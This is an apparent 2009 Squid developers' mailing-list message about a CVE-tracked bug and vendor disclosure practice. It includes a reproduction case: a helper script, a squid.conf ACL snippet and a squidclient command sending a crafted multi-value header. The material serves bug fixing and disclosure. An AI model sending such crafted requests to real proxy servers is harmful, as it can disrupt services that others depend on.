On Tue, 2009-10-13 at 12:12 +1300, Amos Jeffries wrote:

> Okay, I've asked the Debian reporter for access to details.
> Lacking clear evidence of remote exploit I'll follow along with the quiet
> approach.

Right.. meant to provide the details as well but forgot... It can be found
in the RedHat bug report.

https://bugzilla.redhat.com/show_bug.cgi?id=518182

A sample test case is as follows:

-- test-helper.sh (executable) ---
#!/bin/sh
while read line; do
    echo OK
done
-- end test-helper.sh

-- squid.conf (before where access is normally allowed) --
external_acl_type test %{Test:;test} /path/to/test-helper.sh
acl test external test
http_access deny !test
-- end squid.conf --

-- test command --
/usr/bin/squidclient -H "Test: a, b, test=test\n" http://www.squid-cache.org/
-- end test command --

> The CVE has reference to our bugs which are clearly closed. If there is
> more to be done to notify anyone can you let me know what that is please?
> The other CVE from this year are in similar states of questionable
> open/closed-ness.

Ah, now I get what you mean. Yes, we should be more active in giving vendor
feedback to CVE in general.. Contacting [email protected] is a good start I
guess.

Regards
Henrik
